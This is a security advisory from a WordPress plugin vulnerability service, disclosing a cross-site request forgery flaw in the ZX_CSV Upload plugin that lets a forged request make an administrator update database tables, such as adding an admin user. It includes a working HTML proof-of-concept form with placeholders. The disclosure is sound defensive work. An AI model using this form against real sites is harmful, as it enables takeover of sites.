19 Dec

Cross-Site Request Forgery (CSRF)/Database Update Vulnerability in ZX_CSV Upload

We try to include as many plugin vulnerabilities in our data as possible, which involves us looking at reports of vulnerabilities even when almost no one is using them. That includes looking into a report of an authenticated SQL injection vulnerability in ZX_CSV Upload, which is a plugin with less than 10 active installs according to wordpress.org. According to the report you would need to be logged in as an Administrator to exploit this, which generally would rule something out as vulnerability, since administrator would normally have the ability change the database through the capabilities they have (they also would normally be able to modify a plugin to remove any security restrictions), unless you can use cross-site request forgery (CSRF) to cause a logged in administrator to take an action they don’t intend, there wouldn’t be a vulnerability.

When we went to see we could figure out how if that would be possible in this situation we noticed an easier to spot issue. The main functionality of the plugin is to allow you to update database data from an uploaded CSV file. This capability lacks protection against cross-site request forgery so you could cause a logged in Administrators to change information in the database, say add a new Administrator level users to wp_users table. You would need to know what the prefix for the database is, so changing that would actually come in to play with a vulnerability (which it rarely does despite the big deal made about changing it in various security plugins and tutorials).

Proof of Concept

The following proof of concept will cause the selected CSV file to be submitted and the relevant table updated, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[database table]” with the table you want updated.

<html>
<body>
<form method="POST" action="http://[path to WordPress]/wp-admin/admin.php?page=upload_new" enctype="multipart/form-data">
<input type="hidden" name="table_select" value="[database table]">
<input type="file" name="uploaded">
<input type="submit" name="update_db">
</form>
</body>
</html>

Timeline

  • December 19, 2016 – WordPress.org Plugin Directory notified.
  • December 19, 2016 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *